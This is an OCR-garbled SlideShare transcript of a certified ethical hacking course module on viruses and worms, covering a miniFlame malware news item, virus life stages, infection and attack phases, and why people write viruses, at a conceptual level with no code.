Your SlideShare is downloading. ×

Ce hv8 module 07 viruses and worms

524

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
524
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
127
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Viruses and Worms Module 07
  • 2. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker V iru se s and W orm s M o d u le 07 Engineered by Hackers. Presented by Professionals. M E th ic a l H a c k in g a n d C o u n te rm e a s u re s v 8 M o d u le 0 7 : V iru s e s a n d W o r m s E xam 3 1 2 -5 0 M odule 07 Page 1007 Ethical Hacking and C ounterm easures Copyright © by EC-C0linCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 3. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker CEH Secu rity N ew s I GlobalResearch H om e P ro d u c ts About 5«rv*ccs O ctobe r 1 9 ,2 0 1 2 G lo b al C y b e r-W arfa re T a c tic s : N e w F la m e -lin k e d M a lw a re used in “ C y b e r-E s p io n a g e ” A n e w c y b e r e s p io n a g e p ro g ra m lin k e d t o th e n o to r io u s F lam e and Gauss m a lw a re has bee n d e te c te d by Russia's K aspersky Lab. T he a n ti-v iru s g ia n t's c h ie f w a rn s t h a t g lo b a l c y b e r w a rfa r e is in " f u ll s w in g " a n d w ill p ro b a b ly e s c a la te in 2013. T h e v iru s , d u b b e d m in iF la m e , a n d a lso k n o w n as SPE, has a lre a d y in fe c te d c o m p u te rs in Ira n , L e b a n o n , France, t h e U n ite d S ta te s a n d L ith u a n ia . It w as dis c o v e re d in July 20 1 2 a n d is d e s c rib e d as "a small and highly flexible malicious program designed to steal data and control infected systems during targeted cyber espionage operations," Kaspersky Lab said in a s ta te m e n t p o s te d o n its w e b s ite . T he m a lw a re w a s o rig in a lly id e n tifie d as an a p p e n d a g e o f F lam e - th e p ro g ra m used f o r ta rg e te d c y b e r e spionage in th e M id d le East a n d a c k n o w le d g e d to be p a r t o f jo in t U S -ls ra e li e ffo r ts t o u n d e rm in e Iran 's n u c le a r p ro g ra m . B u t la te r, K aspersky Lab a n a ly s ts d is c o v e re d t h a t m in iF la m e is a n "interoperable tool th a t could be used as an independent malicious program, o r concurrently as a plug-in f o r both the Flame and Gauss m alw are." ^ ^ ^ ^ T h e a n a l y s i s a lso s h o w e d n e w e v id e n c e o f c o o p e ra tio n b e tw e e n th e c re a to rs o f F lam e a n d G a u s s ^ ^ ^ ^ ^ — http ://www. globa/research, ca Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. S e c u rity N e w s an M G lo b a l C y b e r - W a r fa r e T a c tic s : N e w M M a lw a re u s e d in F la m e - lin k e d “ C y b e r-E s p io n a g e ” S o u rc e : h t t p : / / w w w . g l o b a l r e s e a r c h . c a A n e w c y b e r e s p io n a g e p r o g r a m lin k e d t o t h e n o t o r i o u s F la m e a n d G auss m a l w a r e has b e e n d e t e c t e d b y Russia's K a s p e rsky Lab. T h e a n t i v i r u s g ia n t 's c h ie f w a r n s t h a t g lo b a l c y b e r w a r f a r e is in " f u l l s w i n g " a n d p r o b a b l y e s c a la te in 2 0 1 3 . T h e v iru s , d u b b e d m in iF la m e , a nd also k n o w n as SPE, has a lr e a d y i n f e c t e d c o m p u t e r s in Iran, L e b a n o n , F rance, t h e U n ite d States, a n d L ith u a n ia . It w a s d is c o v e r e d in July 2 0 1 2 a n d is d e s c r ib e d as "a s m a ll a n d h ig h ly f le x ib le m a lic io u s p r o g r a m d e s ig n e d t o ste a l d a ta a n d c o n t r o l in fe c te d s y s te m s d u r in g ta rg e te d cyber e s p io n a g e o p e ra tio n s ," K a sp e rsky Lab said in a s t a t e m e n t p o s te d o n its w e b s i t e . The m a lw a re w a s o r i g i n a l l y i d e n t if ie d as an a p p e n d a g e o f F lam e, t h e p ro g ra m u sed f o r t a r g e t e d c y b e r e s p io n a g e in t h e M i d d l e East a n d a c k n o w l e d g e d t o be p a r t o f j o i n t US-lsraeli e f f o r t s t o u n d e r m i n e Ira n 's n u c l e a r p r o g r a m . M odule 07 Page 1008 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 4. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker B u t la t e r , K a sp e rsky Lab a n a ly s ts d is c o v e r e d t h a t m i n i F l a m e is an " i n t e r o p e r a b l e t o o l t h a t c o u ld be used as an i n d e p e n d e n t m a lic io u s p r o g r a m , o r c o n c u r r e n t l y as a p lu g - in f o r b o t h t h e Flam e a n d Gauss m a l w a r e . " T h e a na lysis also s h o w e d n e w e v id e n c e o f c o o p e r a t i o n b e t w e e n t h e c r e a t o r s o f F la m e a nd Gauss, as b o t h v iru s e s can use m in i F la m e f o r t h e i r o p e r a t i o n s . " M i n i F l a m e ' s a b i l it y t o be used as a p lu g - in b y e i t h e r F lam e o r Gauss c le a r ly c o n n e c ts t h e c o ll a b o r a t i o n b e t w e e n t h e d e v e l o p m e n t t e a m s o f b o t h F la m e a n d Gauss. Since t h e c o n n e c t i o n b e t w e e n F la m e a n d S t u x n e t / D u q u has a lr e a d y b e e n r e v e a le d , it can be c o n c l u d e d t h a t all th e s e a d v a n c e d t h r e a t s c o m e f r o m t h e s a m e 'c y b e r w a r f a r e ' f a c t o r y , " K a s p e r s k y Lab said. H ig h - p r e c is io n a tta c k to o l So f a r j u s t 5 0 t o 6 0 cases o f in f e c t i o n h a v e b e e n d e t e c t e d w o r l d w i d e , a c c o r d in g t o K a sp e rs ky Lab. B u t u n lik e F lam e a n d Gauss, m in iF la m e in m e a n t f o r in s t a l l a t i o n o n m a c h in e s a lr e a d y i n f e c t e d b y t h o s e v iru se s . " M i n i F l a m e is a h ig h - p r e c is io n a t t a c k t o o l . M o s t lik e ly it is a t a r g e t e d c y b e r w e a p o n used in w h a t can be d e f i n e d as t h e s e c o n d w a v e o f a c y b e r a t t a c k , " K a s p e rsk y's C h ie f S e c u r ity E x p e rt A l e x a n d e r G o s te v e x p la in e d . "F ir s t, F la m e o r Gauss a re used t o in f e c t as m a n y v i c t i m s as p o s s ib le t o c o lle c t la rg e q u a n t i t i e s o f i n f o r m a t i o n . A f t e r d a ta is c o lle c te d a n d r e v i e w e d , a p o t e n t i a l l y i n t e r e s t i n g v i c t i m is d e f i n e d a n d i d e n t if ie d , a n d m in iF la m e is in s t a lle d in o r d e r t o c o n d u c t m o r e in - d e p t h s u r v e il l a n c e a nd c y b e r-e s p io n a g e ." T h e n e w l y - d i s c o v e r e d m a l w a r e can also t a k e s c r e e n s h o t s o f an i n f e c t e d c o m p u t e r w h i l e it is r u n n i n g a s p e c ific p r o g r a m o r a p p li c a t i o n in such as a w e b b r o w s e r , M i c r o s o f t O ffic e p r o g r a m , A d o b e R eader, i n s t a n t m e s s e n g e r se rv ic e o r FTP c lie n t. K a sp e rsky Lab b e lie v e s m in i F la m e 's d e v e lo p e r s h a v e p r o b a b l y c r e a te d d o z e n s o f d i f f e r e n t m o d i f i c a t i o n s o f t h e p r o g r a m . " A t t h i s t i m e , w e h a v e o n l y f o u n d six o f th e s e , d a t e d 2 0 1 0 - 2 0 1 1 , " t h e f i r m said. ‘C y b e r w a rfa re i n f u ll s w i n g ’ M e a n w h i l e , K a s p e rs k y Lab's c o - f o u n d e r a n d CEO E u ge n e K a s p e rs k y w a r n e d t h a t g lo b a l c y b e r w a r f a r e ta c tic s a re b e c o m i n g m o r e s o p h is t ic a t e d w h i l e also b e c o m i n g m o r e t h r e a t e n i n g . He u rg e d g o v e r n m e n t s t o w o r k t o g e t h e r t o f i g h t c y b e r w a r f a r e a n d c y b e r - t e r r o r i s m , X in h u a n e w s a g e n c y r e p o r ts . S p e a k in g a t an I n t e r n a t i o n a l T e l e c o m m u n i c a t i o n U n io n T e le c o m W o r l d c o n f e r e n c e in D u b a i, t h e a n t i v i r u s t y c o o n said, " c y b e r w a r f a r e is in fu ll s w in g a nd w e e x p e c t it t o e s c a la te in 2 0 1 3 ." " T h e la t e s t m a lic io u s v ir u s a t t a c k o n t h e w o r l d ' s la r g e s t o il a n d gas c o m p a n y , Saudi A r a m c o , last A u g u s t s h o w s h o w d e p e n d e n t w e a re t o d a y o n t h e I n t e r n e t a nd i n f o r m a t i o n t e c h n o l o g y in g e n e r a l, a n d h o w v u ln e r a b l e w e a r e ," K a sp e rs ky said. He s t o p p e d s h o r t o f b la m i n g a n y p a r t i c u l a r p la y e r b e h in d t h e m a s s iv e c y b e r - a t t a c k s across t h e M i d d l e East, p o i n t i n g o u t t h a t " o u r j o b is n o t t o i d e n t i t y h a c k e rs o r c y b e r - t e r r o r i s t s . O u r f i r m is M odule 07 Page 1009 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 5. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker like an X -ra y m a c h in e , m e a n i n g w e can scan a n d i d e n t i f y a p r o b l e m , b u t w e c a n n o t say w h o o r w h a t is b e h in d i t . " Iran, w h o c o n f i r m e d t h a t it s u f f e r e d an a t t a c k b y F la m e m a l w a r e t h a t ca u s e d s e v e re d a ta loss, b la m e s t h e U n i t e d S ta te s a nd Israel f o r u n l e a s h i n g t h e c y b e r - a tta c k s . C o p y r i g h t © 2 0 0 5 - 2 0 1 2 G lo b a lR e s e a r c h .c a B y R u s s ia T o d a y http://www.globalresearch.ca/global-cyber-warfare-tactics-new-flame-linked-malware-used-incyber-espionage/5308867 M odule 07 Page 1010 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 6. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker CEH M odule O b jectives J Introduction to Viruses J Computer Worms J Stages of Virus Life J Worm Analysis J Working of Viruses J Worm Maker J Indications of Virus Attack J Malware Analysis Procedure J How does a ComputerGet Infected by Viruses J Online Malware Analysis Services y Virus Analysis J Virus and Worms Countermeasures J Types of Viruses J Antivirus Tools J Virus Maker J Penetration Testing for Virus Copyright © by EC auactl. All Rights Reserved. Reproduction is Strictly Prohibited. -C M o d u le O b je c tiv e s T h e o b j e c t iv e o f th is m o d u l e is t o e x p o s e y o u t o t h e v a r io u s v iru s e s a n d w o r m s a v a ila b le to d a y . It g ive s y o u i n f o r m a t i o n a b o u t all t h e a v a ila b le v iru s e s a n d w o r m s . This m o d u l e e x a m in e s t h e w o r k i n g s o f a c o m p u t e r v iru s , its f u n c t i o n , c la s s ific a tio n , a n d t h e m a n n e r in w h i c h it a ffe c ts s y s te m s . T his m o d u l e w ill go i n t o d e ta il a b o u t t h e v a r io u s c o u n t e r m e a s u r e s a v a ila b le t o p r o t e c t a g a in s t th e s e v ir u s i n f e c tio n s . T h e m a in o b j e c t iv e o f th is m o d u l e is t o e d u c a t e y o u a b o u t t h e a v a ila b le v iru s e s a nd w o r m s , i n d i c a t i o n s o f t h e i r a t t a c k a nd t h e w a y s t o p r o t e c t a g a in s t v a r io u s v iru s e s , a n d t e s t i n g y o u r s y s te m o r n e t w o r k a g a in s t v iru s e s o r w o r m s p re s e n c e . T his m o d u l e w i ll f a m i l i a r i z e y o u w i t h : 0 I n t r o d u c t i o n t o V iru s e s 0 C o m p u te r W o rm s 0 Stages o f V ir u s Life 0 W o r m A n a ly s is 0 W o r k i n g o f V iru s e s 0 W o rm M aker 0 I n d ic a tio n s o f V ir u s A t t a c k 0 M a l w a r e A n a ly s is P r o c e d u r e 0 How 0 O n lin e M a l w a r e A n a ly s is Services 0 V ir u s a nd W o r m s D oes a C o m p u te r V iru se s? 0 T y p e s o f V iru s e s In f e c t e d by C o u n te rm e a su re s V ir u s A n a ly s is 0 Get Modute07 !M a k e r 0 A n t i v i r u s T o o ls Ethical H a c k if^ a n P ^ f i t F i S t i a n e T e ^ Q g t f e f y V i F W f i l l C i l All Rights Reserved. Reproduction is S trictly Prohibited.
  • 7. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Module Flow Virus and Worms Concepts Typ e s of Viruses Penetration Testing Com puter Worms Countermeasures M alware Analysis Copyright © by E&Ctlllcil. All Rights Reserved. Reproduction is Strictly Prohibited. M o d u le F lo w T his s e c tio n in t r o d u c e s y o u t o v a r io u s v iru s e s a n d w o r m s a v a ila b le t o d a y a n d g ive s y o u a b r i e f o v e r v i e w o f e a ch v ir u s a n d s t a t i s t i c s o f v iru s e s a n d w o r m s in t h e r e c e n t y e a rs. It lists v a r io u s t y p e s o f v iru s e s a nd t h e i r e f fe c ts o n y o u r s y s te m . T h e w o r k i n g o f v iru s e s in e a c h p h a s e has w i ll be d iscu sse d in d e ta il. T h e t e c h n i q u e s used b y t h e a t t a c k e r t o d i s t r i b u t e m a l w a r e o n t h e w e b a re h ig h lig h t e d . M alware Analysis V ir u s a n d W o r m s C o n c e p t ,‫• נ‬ Types of Viruses ‫— /י‬ Computer W orm s fj| Countermeasures ||‫־‬ ^ Penetration Testing V ‫— ׳׳‬ M odule 07 Page 1012 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 8. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Introduction to V iru se s C EH _l A virus is a self-replicating program that produces its own copy by attaching itself to another program, computer boot sector or document J Viruses are generally transmitted through file downloads, infected disk/flash drives and as email attachments V ir u s C h a r a c t e r is t ic s Alters Data Infects Other Program V % Corrupts Files and Programs Transforms Itself m F* Encrypts Itself m Copyright © by Self Propagates % # 1 f § 1 EC auactl. All Rights Reserved. Reproduction is Strictly Prohibited. -C ‫ ןא‬I n t r o d u c t i o n to V i r u s e s C o m p u t e r v i r u s e s h a v e t h e p o t e n t i a l t o w r e a k h a v o c o n b o t h b u sin e ss a n d p e r s o n a l c o m p u t e r s . W o r l d w i d e , m o s t b u sin e sse s h a ve b e e n i n f e c t e d a t s o m e p o i n t . A v ir u s is a se lfr e p li c a t i n g p r o g r a m t h a t p r o d u c e s its o w n c o d e b y a t t a c h i n g c o p ie s o f it i n t o o t h e r e x e c u ta b le c o d e s. T his v ir u s o p e r a t e s w i t h o u t t h e k n o w l e d g e o r d e s ire o f t h e user. Like a real v iru s , a c o m p u t e r v ir u s is c o n t a g i o u s a n d can c o n t a m i n a t e o t h e r file s. H o w e v e r , v iru s e s can i n f e c t o u t s i d e m a c h in e s o n l y w i t h t h e a ss ista n ce o f c o m p u t e r users. S o m e v iru s e s a f f e c t c o m p u t e r s as soon as t h e i r c o d e is e x e c u t e d ; o t h e r v iru s e s lie d o r m a n t u n t i l a p r e - d e t e r m i n e d logical c i r c u m s t a n c e is m e t . T h e r e a re t h r e e c a te g o r ie s o f m a lic io u s p r o g r a m s : 0 T r o ja n s a n d r o o t k i t s 0 V iru s e s 0 W o rm s A w o r m is a m a lic io u s p r o g r a m t h a t can in f e c t b o t h local a n d r e m o t e m a c h in e s . W o r m s s p re a d a u t o m a t i c a l l y b y in f e c t i n g s y s te m a f t e r s y s te m in a n e t w o r k , a n d e v e n s p r e a d in g f u r t h e r t o o t h e r n e t w o r k s . T h e r e f o r e , w o r m s h a ve a g r e a t e r p o t e n t i a l f o r c a u s in g d a m a g e b e c a u s e t h e y d o n o t r e ly o n t h e u s e r's a c tio n s f o r e x e c u t i o n . T h e r e a re also m a l i c i o u s p r o g r a m s in t h e w i ld t h a t c o n t a i n all o f t h e f e a t u r e s o f th e s e t h r e e m a lic io u s p r o g r a m s . M odule 07 Page 1013 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 9. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Virus and Worm Statistics 75,000,000 60,000,000 45,000,000 30,000,000 15,000,000 2010 2008 Copyright © by 2011 2012 http://www.av-test. org E&Ctinctl. All Rights Reserved. Reproduction is Strictly Prohibited. ^ V iru s a n d W o rm S ta tis tic s S o u rc e : h t t p : / / w w w . a v - t e s t . o r g T his g ra p h ic a l r e p r e s e n t a t i o n g ive s d e t a i le d i n f o r m a t i o n o f t h e a t t a c k s t h a t h a v e o c c u r r e d in t h e r e c e n t y e a rs. A c c o r d i n g t o t h e g r a p h , o n l y 1 1 ,6 6 6 , 6 6 7 s y s te m s w e r e a f f e c t e d b y v iru s e s a nd w orm s in t h e year 2008, w he re a s in t h e ye ar 2012, th e c o u n t d ra s tic a lly in c r e a s e d to 7 0 ,0 0 0 ,0 0 0 s y s te m s , w h i c h m e a n s t h a t t h e g r o w t h o f m a l w a r e a tta c k s o n s y s te m s is in c r e a s in g e x p o n e n t ia l ly y e a r b y ye a r. M odule 07 Page 1014 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 10. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker 7 5 .0 0 0 .0 0 0 6 0 .0 0 0 .0 0 0 4 5 .0 0 0 .0 0 0 3 0 .0 0 0 .0 0 0 1 5 .0 0 0 .0 0 0 0 2008 2009 2010 2011 2012 FIGURE 7.1: Virus and Worm Statistics M odule 07 Page 1015 Ethical Hacking and C ounterm easures Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 11. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Design Replication Launch D eveloping virus V iru s replicates fo r code using a perio d o f tim e It gets activated w ith th e user p e rfo rm in g p ro g ra m m in g w ith in th e ta rg e t certa in action s such languages or system and th e n as ru n n in g an c o n s tru c tio n kits spreads its e lf in fected program Incorporation Detection Users in s ta ll Elim ination A n tiv iru s s o ftw a r e A v iru s is id e n tifie d a n tiv iru s u p d a te s d e v e lo p e rs as t h re a t in fe c tin g a n d e lim in a te th e a s s im ila te d efenses ta rg e t system s v iru s th re a ts a g a in s t th e viru s S t a g e s o f V i r u s L ife C o m p u t e r v ir u s a tta c k s s p re a d t h r o u g h v a r io u s sta ge s f r o m i n c e p t io n t o d e s ig n t o e lim in a tio n . 1. Design: A v ir u s c o d e is d e v e lo p e d by u s in g p r o g r a m m i n g la n g u a g e s o r c o n s t r u c t i o n kits. A n y o n e w i t h basic p r o g r a m m i n g k n o w l e d g e can c r e a te a viru s . 2. Replication: A v ir u s f i r s t r e p lic a te s it s e lf w i t h i n a t a r g e t s y s te m o v e r a p e r io d o f t i m e . 3. Launch: It is a c t i v a t e d w h e n a u s e r p e r f o r m s c e r t a i n a c tio n s such as t r i g g e r i n g o r r u n n i n g an in fe c te d p ro g ra m . 4. Detection: A v ir u s is i d e n t if ie d as a t h r e a t i n f e c t i n g t a r g e t s y s te m s . Its a c tio n s ca use c o n s id e r a b le d a m a g e t o t h e t a r g e t s y s te m 's d a ta . M odule 07 Page 1016 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 12. Ethical Hacking and Countermeasures Viruses and W orm s 5. Exam 312-50 C ertified Ethical Hacker Incorporation: A n t i v i r u s s o f t w a r e d e v e l o p e r s a s s e m b l e d e f e n s e s a g a in s t t h e viru s . 6. Elimination: Users a re a d v is e d t o in s ta ll a n t i v i r u s s o f t w a r e u p d a te s , t h u s c r e a t i n g a w a r e n e s s a m o n g user g ro up s M odule 07 Page 1017 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 13. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Working of Viruses: Infection Phase Infection Phase J In the infection phase, the virus replicates itself and attaches to an .exe file in the system Before Infection After Infection * C lean File V iru s In fe c te d File Copyright © by E -G G 0llicil. All Rights Reserved. Reproduction is Strictly Prohibited. W o rk in g o f V iru se s: In fe c tio n P h a s e V ir u s e s a tta c k a ta rg e t h o s t's s y s te m by u sin g v a r io u s m e th o d s . They a tta c h t h e m s e l v e s t o p r o g r a m s a n d t r a n s m i t t h e m s e l v e s t o o t h e r p r o g r a m s by m a k in g use o f c e r ta in e v e n ts . V iru s e s n e e d such e v e n ts t o ta k e p la ce sin ce t h e y c a n n o t: © S e lf s t a r t © In f e c t o t h e r h a r d w a r e © Cause p h y s ic a l d a m a g e t o a c o m p u t e r © T r a n s m i t t h e m s e l v e s u sin g n o n - e x e c u t a b l e file s G e n e r a lly v iru s e s h a ve t w o phases, t h e i n f e c t i o n p h a s e a n d t h e a t t a c k p h a s e . In t h e i n f e c t i o n p ha se, t h e v i r u s r e p li c a t e s i t s e lf a n d a t t a c h e s t o an .e xe f ile in t h e s y s te m . P r o g r a m s m o d i f i e d by a v ir u s i n f e c t i o n can e n a b le v ir u s f u n c t i o n a l i t i e s t o ru n o n t h a t s y s te m . V iru s e s g e t e n a b le d as s o o n as t h e i n f e c t e d p r o g r a m is e x e c u te d , since t h e p r o g r a m c o d e leads t o t h e v ir u s c o d e . V ir u s w r i t e r s h a v e t o m a i n t a i n a b a la n c e a m o n g f a c t o r s such as: © H o w w i ll t h e v ir u s in f e c t? © H o w w i ll it s p re a d ? © H o w w i ll it re s id e in a t a r g e t c o m p u t e r ' s m e m o r y w i t h o u t b e in g d e t e c t e d ? M odule 07 Page 1018 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 14. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker O b v io u s ly , v iru s e s h a v e t o b e t r i g g e r e d a n d e x e c u t e d in o r d e r t o f u n c t i o n . T h e r e a re m a n y w a y s t o e x e c u te p r o g r a m s w h i l e a c o m p u t e r is r u n n in g . For e x a m p le , a n y s e tu p p r o g r a m calls f o r n u m e r o u s p r o g r a m s t h a t m a y be b u i l t i n t o a s y s te m , a n d s o m e o f th e s e a re d i s t r i b u t i o n m e d i u m p r o g r a m s . T hu s, if a v ir u s p r o g r a m a lr e a d y exists, it can be a c tiv a te d w i t h t h is k in d o f e x e c u t i o n a n d in f e c t t h e a d d it io n a l s e t u p p r o g r a m as w e ll. T h e r e a re v ir u s p r o g r a m s t h a t in f e c t a n d k e e p s p r e a d in g e v e r y t i m e t h e y a re e x e c u te d . Some p r o g r a m s d o n o t in f e c t t h e p r o g r a m s w h e n f i r s t e x e c u te d . T h e y re s id e in a c o m p u t e r ' s m e m o r y a n d in f e c t p r o g r a m s a t a l a t e r t i m e . Such v ir u s p r o g r a m s as TSR w a i t f o r a s p e c ifie d t r i g g e r e v e n t t o s p re a d a t a l a t e r s ta ge . It is, t h e r e f o r e , d i f f i c u l t t o r e c o g n iz e w h i c h e v e n t m i g h t t r i g g e r t h e e x e c u t i o n o f a d o r m a n t v ir u s i n f e c t i o n . R e fe r t o t h e f i g u r e t h a t f o l l o w s t o see h o w t h e EXE file i n f e c t i o n w o r k s . In t h e f o l l o w i n g f ig u r e , t h e .EXE file 's h e a d e r , w h e n t r i g g e r e d , e x e c u te s a n d s ta r t s r u n n i n g t h e a p p li c a t i o n . O n c e t h is file is i n f e c t e d , a n y t r i g g e r e v e n t f r o m t h e file 's h e a d e r can a c t i v a t e t h e v ir u s c o d e t o o , a lo n g w i t h t h e a p p li c a t i o n p r o g r a m as s o o n as it is ru n . Q A f ile v ir u s i n f e c ts b y a t t a c h i n g its e lf t o an e x e c u t a b l e s y s te m a p p li c a t i o n p r o g r a m . T e x t file s su ch as s o u r c e c o d e , b a tc h file s, s c r ip t files, e tc., a re c o n s id e r e d p o t e n t i a l t a r g e t s f o r v iru s in f e c tio n s . © B o o t s e c t o r v iru s e s e x e c u te t h e i r o w n c o d e in t h e f i r s t p la ce b e f o r e t h e t a r g e t PC is b o o te d Before Infection A fte r Infection .exe N _u Clean File Virus Infected File FIGURE 7.2: Working of Viruses in Infection Phase M odule 07 Page 1019 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 15. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Working of Viruses: Attack D U ^ ^ r cu V t o q p 11 Urt‫׳‬fW < ttkxjl Nm Im J Viruses are programmed with trigger events to activate and corrupt systems J Some viruses infect each time they are run and others infect only when a certain predefined condition is met such as a user's specific ta sk , a day, time, or a particular event Unfragmented File Before Attack File: A 1 1 1 Page:2 J _____________ 1 Page:3 A Page: 1 File: B 1 A Page:2 Page: 1 Page:3 File Fragmented Due to Virus Attack Page: 1 File: A Page:3 File: B Page:3 File: A Page: 1 File: B Copyright © by Page:2 File: B Page:2 File: A E& Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. W o rk in g o f V iru se s: A tta c k P h a s e O n c e v iru s e s s p re a d t h e m s e l v e s t h r o u g h o u t t h e t a r g e t s y s te m , t h e y s t a r t c o r r u p t i n g t h e fi l e s a n d p r o g r a m s o f t h e h o s t s y s te m . S o m e v iru s e s h a v e t r i g g e r e v e n ts t h a t n e e d t o be a c t i v a t e d t o c o r r u p t t h e h o s t s y s te m . S o m e v i r u s e s h a v e bugs t h a t r e p lic a t e th e m s e lv e s , a nd p e r f o r m a c tiv it ie s such as d e l e t i n g f i l e s a n d in c r e a s in g s e s s io n t i m e . T h e y c o r r u p t t h e i r t a r g e t s o n l y a f t e r s p r e a d in g as i n t e n d e d b y t h e i r d e v e lo p e r s . M o s t v iru s e s t h a t a t t a c k t a r g e t s y s te m s p e r f o r m a c tio n s such as: Q D e le tin g file s a n d a l t e r i n g c o n t e n t in d a ta file s, t h e r e b y c a u s in g t h e s y s te m t o s lo w down e P e r f o r m in g ta sks not r e la t e d to a p p lic a tio n s , such as p la y in g m u s ic and c r e a tin g a n im a tio n s M odule 07 Page 1020 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 16. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker U n f r a g m e n t e d F ile B e fo r e A t t a c k File: A Page: 1 Page: 2 File: B Page: 3 Page: 1 Page: 2 Page: 3 A F ile F r a g m e n t e d D u e t o V ir u s A t t a c k Page: 1 File: A Page: 3 File: B Page: 1 File: B Page: 3 File: A Page: 2 File: B A Page: 2 File: A A FIGURE 7.3: Working of Viruses in Attack Phase R e fe r t o t h is f i g u r e , w h i c h has t w o file s, A a n d B. In s e c tio n o n e , t h e t w o file s a re l o c a te d o n e a f t e r t h e o t h e r in an o r d e r l y f a s h io n . O n c e a v ir u s c o d e i n f e c ts t h e file , it a lte r s t h e p o s i t i o n i n g o f t h e file s t h a t w e r e c o n s e c u t i v e l y p la c e d , t h u s l e a d in g t o in a c c u r a c y in f ile a llo c a tio n s , c a u s in g t h e s y s te m t o s l o w d o w n as users t r y t o r e t r i e v e t h e i r file s. In t h i s p ha se: © V iru s e s e x e c u te w h e n s o m e e v e n ts a re t r i g g e r e d 0 S o m e e x e c u te a n d c o r r u p t via b u i l t - i n b u g p r o g r a m s a f t e r b e in g s t o r e d in t h e h o s t's m em ory 0 M o s t v iru s e s a re w r i t t e n t o c o n c e a l t h e i r p re s e n c e , a t t a c k in g o n l y a f t e r s p r e a d in g in t h e h o s t t o t h e f u l le s t e x t e n t M odule 07 Page 1021 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 17. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker W h y Do People Create Computer Viruses r cu | UrtifWd ttkiul Km Im Computer Viruses Inflict damage to competitors J J J Financial benefits Research projects Play prank Vandalism Cyber terrorism Distribute political messages V u ln e r a b le S y s te m Copyright © by E& Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. W hy Do P e o p le C re a te C o m p u te r V iru se s? S o u rc e : h t t p : / / w w w . s e c u r i t y d o c s . c o m C o m p u t e r v iru s e s a re n o t s e lf - g e n e r a t e d , b u t a re c r e a te d b y c y b e r - c r i m i n a l m in d s , i n t e n t i o n a l l y d e s ig n e d t o ca use d e s t r u c t i v e o c c u r r e n c e s in a s y s te m . G e n e ra lly , v iru s e s a re c r e a te d w i t h a d is r e p u t a b l e m o t i v e . C y b e r - c r im i n a l s c r e a te v iru s e s t o d e s t r o y a c o m p a n y 's d a ta , as an a c t o f v a n d a lis m o r a p ra n k , o r t o d e s t r o y a c o m p a n y 's p r o d u c ts . H o w e v e r , in s o m e cases, v iru s e s are a c t u a lly in te n d e d to be g o o d fo r a s y s te m . T he se a re d e s ig n e d to im p ro v e a s y s te m 's p e r f o r m a n c e b y d e l e t in g p r e v io u s ly e m b e d d e d v iru s e s f r o m files. S o m e r e a s o n s v iru s e s h a v e b e e n w r i t t e n in c lu d e : e I n flic t d a m a g e t o c o m p e t i t o r s e R esearch p r o je c ts 0 Pranks Q V a n d a lis m e A t t a c k t h e p r o d u c t s o f s p e c ific c o m p a n i e s © D is t r i b u t e p o litic a l m essa ge s 0 F ina ncia l g ain M odule 07 Page 1022 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
